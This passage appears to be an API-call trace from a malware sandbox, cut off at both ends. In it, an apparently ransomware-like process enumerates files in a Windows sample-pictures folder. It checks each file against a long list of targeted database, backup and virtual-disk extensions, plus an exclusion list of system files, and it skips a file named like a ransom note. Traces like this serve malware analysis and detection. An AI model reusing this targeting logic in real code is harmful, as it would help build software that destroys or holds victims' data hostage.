3 [0039.900] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.900] lstrlenW (lpString="adb") returned 3 [0039.900] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.900] lstrlenW (lpString="ade") returned 3 [0039.900] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0039.900] lstrlenW (lpString="adf") returned 3 [0039.900] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0039.900] lstrlenW (lpString="adn") returned 3 [0039.900] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0039.900] lstrlenW (lpString="adp") returned 3 [0039.901] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0039.901] lstrlenW (lpString="alf") returned 3 [0039.901] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0039.901] lstrlenW (lpString="ask") returned 3 [0039.901] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0039.901] lstrlenW (lpString="btr") returned 3 [0039.901] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0039.901] lstrlenW (lpString="cat") returned 3 [0039.901] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0039.901] lstrlenW (lpString="cdb") returned 3 [0039.901] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0039.901] lstrlenW (lpString="ckp") returned 3 [0039.901] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0039.901] lstrlenW (lpString="cma") returned 3 [0039.901] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0039.901] lstrlenW (lpString="cpd") returned 3 [0039.901] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0039.901] lstrlenW (lpString="dacpac") returned 6 [0039.901] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0039.901] lstrlenW (lpString="dad") returned 3 [0039.901] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0039.901] lstrlenW (lpString="dadiagrams") returned 10 [0039.901] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0039.901] lstrlenW (lpString="daschema") returned 8 [0039.901] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0039.901] lstrlenW (lpString="db-journal") returned 10 [0039.901] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0039.901] lstrlenW (lpString="db-shm") returned 6 [0039.901] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0039.901] lstrlenW (lpString="db-wal") returned 6 [0039.901] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0039.901] lstrlenW (lpString="dbc") returned 3 [0039.901] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0039.901] lstrlenW (lpString="dbs") returned 3 [0039.901] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0039.902] lstrlenW (lpString="dbt") returned 3 [0039.902] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0039.902] lstrlenW (lpString="dbv") returned 3 [0039.902] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0039.902] lstrlenW (lpString="dbx") returned 3 [0039.902] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0039.902] lstrlenW (lpString="dcb") returned 3 [0039.902] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0039.902] lstrlenW (lpString="dct") returned 3 [0039.902] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0039.902] lstrlenW (lpString="dcx") returned 3 [0039.902] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0039.902] lstrlenW (lpString="ddl") returned 3 [0039.902] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0039.902] lstrlenW (lpString="dlis") returned 4 [0039.902] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0039.902] lstrlenW (lpString="dp1") returned 3 [0039.902] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0039.902] lstrlenW (lpString="dqy") returned 3 [0039.902] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0039.902] lstrlenW (lpString="dsk") returned 3 [0039.902] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0039.902] lstrlenW (lpString="dsn") returned 3 [0039.902] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0039.902] lstrlenW (lpString="dtsx") returned 4 [0039.902] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0039.902] lstrlenW (lpString="dxl") returned 3 [0039.902] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0039.902] lstrlenW (lpString="eco") returned 3 [0039.902] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0039.902] lstrlenW (lpString="ecx") returned 3 [0039.902] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0039.902] lstrlenW (lpString="edb") returned 3 [0039.902] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0039.903] lstrlenW (lpString="epim") returned 4 [0039.903] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0039.903] lstrlenW (lpString="fcd") returned 3 [0039.903] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0039.903] lstrlenW (lpString="fdb") returned 3 [0039.903] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0039.903] lstrlenW (lpString="fic") returned 3 [0039.903] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0039.903] lstrlenW (lpString="flexolibrary") returned 12 [0039.903] lstrlenW (lpString="fm5") returned 3 [0039.903] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0039.903] lstrlenW (lpString="fmp") returned 3 [0039.903] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0039.903] lstrlenW (lpString="fmp12") returned 5 [0039.903] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0039.903] lstrlenW (lpString="fmpsl") returned 5 [0039.903] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0039.903] lstrlenW (lpString="fol") returned 3 [0039.903] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0039.903] lstrlenW (lpString="fp3") returned 3 [0039.903] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0039.903] lstrlenW (lpString="fp4") returned 3 [0039.903] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0039.903] lstrlenW (lpString="fp5") returned 3 [0039.903] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0039.903] lstrlenW (lpString="fp7") returned 3 [0039.903] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0039.903] lstrlenW (lpString="fpt") returned 3 [0039.903] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0039.903] lstrlenW (lpString="frm") returned 3 [0039.903] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0039.903] lstrlenW (lpString="gdb") returned 3 [0039.903] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.903] lstrlenW (lpString="gdb") returned 3 [0039.904] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.904] lstrlenW (lpString="grdb") returned 4 [0039.904] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0039.904] lstrlenW (lpString="gwi") returned 3 [0039.904] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0039.904] lstrlenW (lpString="hdb") returned 3 [0039.904] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0039.904] lstrlenW (lpString="his") returned 3 [0039.904] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0039.904] lstrlenW (lpString="ib") returned 2 [0039.904] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0039.904] lstrlenW (lpString="idb") returned 3 [0039.904] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0039.904] lstrlenW (lpString="ihx") returned 3 [0039.904] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0039.904] lstrlenW (lpString="itdb") returned 4 [0039.904] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0039.904] lstrlenW (lpString="itw") returned 3 [0039.904] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0039.904] lstrlenW (lpString="jet") returned 3 [0039.904] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0039.904] lstrlenW (lpString="jtx") returned 3 [0039.904] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0039.904] lstrlenW (lpString="kdb") returned 3 [0039.904] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0039.904] lstrlenW (lpString="kexi") returned 4 [0039.904] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0039.904] lstrlenW (lpString="kexic") returned 5 [0039.904] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0039.904] lstrlenW (lpString="kexis") returned 5 [0039.904] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0039.904] lstrlenW (lpString="lgc") returned 3 [0039.904] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0039.904] lstrlenW (lpString="lwx") returned 3 [0039.904] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0039.905] lstrlenW (lpString="maf") returned 3 [0039.905] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0039.905] lstrlenW (lpString="maq") returned 3 [0039.905] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0039.905] lstrlenW (lpString="mar") returned 3 [0039.905] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0039.905] lstrlenW (lpString="marshal") returned 7 [0039.905] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0039.905] lstrlenW (lpString="mas") returned 3 [0039.905] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0039.905] lstrlenW (lpString="mav") returned 3 [0039.905] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0039.905] lstrlenW (lpString="maw") returned 3 [0039.905] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0039.905] lstrlenW (lpString="mdbhtml") returned 7 [0039.905] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0039.905] lstrlenW (lpString="mdn") returned 3 [0039.905] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0039.905] lstrlenW (lpString="mdt") returned 3 [0039.905] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0039.905] lstrlenW (lpString="mfd") returned 3 [0039.905] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0039.905] lstrlenW (lpString="mpd") returned 3 [0039.905] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0039.905] lstrlenW (lpString="mrg") returned 3 [0039.905] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0039.905] lstrlenW (lpString="mud") returned 3 [0039.905] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0039.905] lstrlenW (lpString="mwb") returned 3 [0039.905] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0039.905] lstrlenW (lpString="myd") returned 3 [0039.905] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0039.905] lstrlenW (lpString="ndf") returned 3 [0039.905] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0039.905] lstrlenW (lpString="nnt") returned 3 [0039.906] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0039.906] lstrlenW (lpString="nrmlib") returned 6 [0039.906] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0039.906] lstrlenW (lpString="ns2") returned 3 [0039.906] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0039.906] lstrlenW (lpString="ns3") returned 3 [0039.906] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0039.906] lstrlenW (lpString="ns4") returned 3 [0039.906] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0039.906] lstrlenW (lpString="nsf") returned 3 [0039.906] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0039.906] lstrlenW (lpString="nv") returned 2 [0039.906] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0039.906] lstrlenW (lpString="nv2") returned 3 [0039.906] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0039.906] lstrlenW (lpString="nwdb") returned 4 [0039.906] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0039.906] lstrlenW (lpString="nyf") returned 3 [0039.906] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0039.906] lstrlenW (lpString="odb") returned 3 [0039.906] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.906] lstrlenW (lpString="odb") returned 3 [0039.906] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.906] lstrlenW (lpString="oqy") returned 3 [0039.906] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0039.906] lstrlenW (lpString="ora") returned 3 [0039.906] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0039.906] lstrlenW (lpString="orx") returned 3 [0039.906] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0039.906] lstrlenW (lpString="owc") returned 3 [0039.906] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0039.906] lstrlenW (lpString="p96") returned 3 [0039.906] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0039.906] lstrlenW (lpString="p97") returned 3 [0039.907] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0039.907] lstrlenW (lpString="pan") returned 3 [0039.907] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0039.907] lstrlenW (lpString="pdb") returned 3 [0039.907] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0039.907] lstrlenW (lpString="pdm") returned 3 [0039.907] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0039.907] lstrlenW (lpString="pnz") returned 3 [0039.907] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0039.907] lstrlenW (lpString="qry") returned 3 [0039.907] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0039.907] lstrlenW (lpString="qvd") returned 3 [0039.907] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0039.907] lstrlenW (lpString="rbf") returned 3 [0039.907] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0039.907] lstrlenW (lpString="rctd") returned 4 [0039.907] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0039.907] lstrlenW (lpString="rod") returned 3 [0039.907] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0039.907] lstrlenW (lpString="rodx") returned 4 [0039.907] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0039.907] lstrlenW (lpString="rpd") returned 3 [0039.907] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0039.907] lstrlenW (lpString="rsd") returned 3 [0039.907] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0039.907] lstrlenW (lpString="sas7bdat") returned 8 [0039.907] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0039.907] lstrlenW (lpString="sbf") returned 3 [0039.907] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0039.907] lstrlenW (lpString="scx") returned 3 [0039.907] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0039.907] lstrlenW (lpString="sdb") returned 3 [0039.907] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0039.907] lstrlenW (lpString="sdc") returned 3 [0039.907] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0039.908] lstrlenW (lpString="sdf") returned 3 [0039.908] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0039.908] lstrlenW (lpString="sis") returned 3 [0039.908] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0039.908] lstrlenW (lpString="spq") returned 3 [0039.908] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0039.908] lstrlenW (lpString="te") returned 2 [0039.908] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0039.908] lstrlenW (lpString="teacher") returned 7 [0039.908] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0039.908] lstrlenW (lpString="tmd") returned 3 [0039.908] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0039.908] lstrlenW (lpString="tps") returned 3 [0039.908] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0039.908] lstrlenW (lpString="trc") returned 3 [0039.908] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.908] lstrlenW (lpString="trc") returned 3 [0039.908] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.908] lstrlenW (lpString="trm") returned 3 [0039.908] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0039.908] lstrlenW (lpString="udb") returned 3 [0039.908] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0039.908] lstrlenW (lpString="udl") returned 3 [0039.908] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0039.908] lstrlenW (lpString="usr") returned 3 [0039.908] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0039.908] lstrlenW (lpString="v12") returned 3 [0039.908] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0039.908] lstrlenW (lpString="vis") returned 3 [0039.908] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0039.908] lstrlenW (lpString="vpd") returned 3 [0039.908] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0039.908] lstrlenW (lpString="vvv") returned 3 [0039.908] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0039.908] lstrlenW (lpString="wdb") returned 3 [0039.909] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0039.909] lstrlenW (lpString="wmdb") returned 4 [0039.909] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0039.909] lstrlenW (lpString="wrk") returned 3 [0039.909] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0039.909] lstrlenW (lpString="xdb") returned 3 [0039.909] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0039.909] lstrlenW (lpString="xld") returned 3 [0039.909] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0039.909] lstrlenW (lpString="xmlff") returned 5 [0039.909] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0039.909] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4970c680, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4970c680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0039.909] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0039.909] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x91554, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hydrangeas.jpg", cAlternateFileName="HYDRAN~1.JPG")) returned 1 [0039.909] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.909] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="aoldtz.exe") returned 1 [0039.909] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2=".") returned 1 [0039.909] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="..") returned 1 [0039.909] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="windows") returned -1 [0039.909] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="bootmgr") returned 1 [0039.909] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="temp") returned -1 [0039.909] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="pagefile.sys") returned -1 [0039.909] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="boot") returned 1 [0039.909] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="ids.txt") returned -1 [0039.909] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="ntuser.dat") returned -1 [0039.909] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="perflogs") returned -1 [0039.909] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="MSBuild") returned -1 [0039.909] lstrlenW (lpString="Hydrangeas.jpg") returned 14 [0039.909] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini") returned 52 [0039.909] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="Hydrangeas.jpg" | out: lpString1="Hydrangeas.jpg") returned="Hydrangeas.jpg" [0039.909] lstrlenW (lpString="Hydrangeas.jpg") returned 14 [0039.909] lstrlenW (lpString="Ares865") returned 7 [0039.909] lstrcmpiW (lpString1="eas.jpg", lpString2="Ares865") returned 1 [0039.910] lstrlenW (lpString=".dll") returned 4 [0039.910] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2=".dll") returned 1 [0039.910] lstrlenW (lpString=".lnk") returned 4 [0039.910] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2=".lnk") returned 1 [0039.910] lstrlenW (lpString=".ini") returned 4 [0039.910] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2=".ini") returned 1 [0039.910] lstrlenW (lpString=".sys") returned 4 [0039.910] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2=".sys") returned 1 [0039.910] lstrlenW (lpString="Hydrangeas.jpg") returned 14 [0039.910] lstrlenW (lpString="bak") returned 3 [0039.910] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0039.910] lstrlenW (lpString="ba_") returned 3 [0039.910] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0039.910] lstrlenW (lpString="dbb") returned 3 [0039.910] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0039.910] lstrlenW (lpString="vmdk") returned 4 [0039.910] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0039.910] lstrlenW (lpString="rar") returned 3 [0039.910] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0039.910] lstrlenW (lpString="zip") returned 3 [0039.910] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0039.910] lstrlenW (lpString="tgz") returned 3 [0039.910] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0039.910] lstrlenW (lpString="vbox") returned 4 [0039.910] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0039.910] lstrlenW (lpString="vdi") returned 3 [0039.910] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0039.910] lstrlenW (lpString="vhd") returned 3 [0039.910] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0039.910] lstrlenW (lpString="vhdx") returned 4 [0039.910] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0039.910] lstrlenW (lpString="avhd") returned 4 [0039.910] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0039.911] lstrlenW (lpString="db") returned 2 [0039.911] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0039.911] lstrlenW (lpString="db2") returned 3 [0039.911] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0039.911] lstrlenW (lpString="db3") returned 3 [0039.911] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0039.911] lstrlenW (lpString="dbf") returned 3 [0039.911] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0039.911] lstrlenW (lpString="mdf") returned 3 [0039.911] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0039.911] lstrlenW (lpString="mdb") returned 3 [0039.911] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0039.911] lstrlenW (lpString="sql") returned 3 [0039.911] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0039.911] lstrlenW (lpString="sqlite") returned 6 [0039.911] lstrcmpiW (lpString1="as.jpg", lpString2="sqlite") returned -1 [0039.911] lstrlenW (lpString="sqlite3") returned 7 [0039.911] lstrcmpiW (lpString1="eas.jpg", lpString2="sqlite3") returned -1 [0039.911] lstrlenW (lpString="sqlitedb") returned 8 [0039.911] lstrcmpiW (lpString1="geas.jpg", lpString2="sqlitedb") returned -1 [0039.911] lstrlenW (lpString="xml") returned 3 [0039.911] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0039.911] lstrlenW (lpString="$er") returned 3 [0039.911] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0039.911] lstrlenW (lpString="4dd") returned 3 [0039.911] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0039.911] lstrlenW (lpString="4dl") returned 3 [0039.911] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0039.911] lstrlenW (lpString="^^^") returned 3 [0039.911] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0039.911] lstrlenW (lpString="abs") returned 3 [0039.911] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0039.911] lstrlenW (lpString="abx") returned 3 [0039.911] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0039.912] lstrlenW (lpString="accdb") returned 5 [0039.912] lstrcmpiW (lpString1="s.jpg", lpString2="accdb") returned 1 [0039.912] lstrlenW (lpString="accdc") returned 5 [0039.912] lstrcmpiW (lpString1="s.jpg", lpString2="accdc") returned 1 [0039.912] lstrlenW (lpString="accde") returned 5 [0039.912] lstrcmpiW (lpString1="s.jpg", lpString2="accde") returned 1 [0039.912] lstrlenW (lpString="accdr") returned 5 [0039.912] lstrcmpiW (lpString1="s.jpg", lpString2="accdr") returned 1 [0039.912] lstrlenW (lpString="accdt") returned 5 [0039.912] lstrcmpiW (lpString1="s.jpg", lpString2="accdt") returned 1 [0039.912] lstrlenW (lpString="accdw") returned 5 [0039.912] lstrcmpiW (lpString1="s.jpg", lpString2="accdw") returned 1 [0039.912] lstrlenW (lpString="accft") returned 5 [0039.912] lstrcmpiW (lpString1="s.jpg", lpString2="accft") returned 1 [0039.912] lstrlenW (lpString="adb") returned 3 [0039.912] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0039.912] lstrlenW (lpString="adb") returned 3 [0039.912] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0039.912] lstrlenW (lpString="ade") returned 3 [0039.912] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0039.912] lstrlenW (lpString="adf") returned 3 [0039.912] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0039.912] lstrlenW (lpString="adn") returned 3 [0039.912] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0039.912] lstrlenW (lpString="adp") returned 3 [0039.912] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0039.912] lstrlenW (lpString="alf") returned 3 [0039.912] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0039.912] lstrlenW (lpString="ask") returned 3 [0039.912] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0039.912] lstrlenW (lpString="btr") returned 3 [0039.912] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0039.912] lstrlenW (lpString="cat") returned 3 [0039.912] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0039.913] lstrlenW (lpString="cdb") returned 3 [0039.913] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0039.913] lstrlenW (lpString="ckp") returned 3 [0039.913] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0039.913] lstrlenW (lpString="cma") returned 3 [0039.913] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0039.913] lstrlenW (lpString="cpd") returned 3 [0039.913] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0039.913] lstrlenW (lpString="dacpac") returned 6 [0039.913] lstrcmpiW (lpString1="as.jpg", lpString2="dacpac") returned -1 [0039.913] lstrlenW (lpString="dad") returned 3 [0039.913] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0039.913] lstrlenW (lpString="dadiagrams") returned 10 [0039.913] lstrcmpiW (lpString1="angeas.jpg", lpString2="dadiagrams") returned -1 [0039.913] lstrlenW (lpString="daschema") returned 8 [0039.913] lstrcmpiW (lpString1="geas.jpg", lpString2="daschema") returned 1 [0039.913] lstrlenW (lpString="db-journal") returned 10 [0039.913] lstrcmpiW (lpString1="angeas.jpg", lpString2="db-journal") returned -1 [0039.913] lstrlenW (lpString="db-shm") returned 6 [0039.913] lstrcmpiW (lpString1="as.jpg", lpString2="db-shm") returned -1 [0039.913] lstrlenW (lpString="db-wal") returned 6 [0039.913] lstrcmpiW (lpString1="as.jpg", 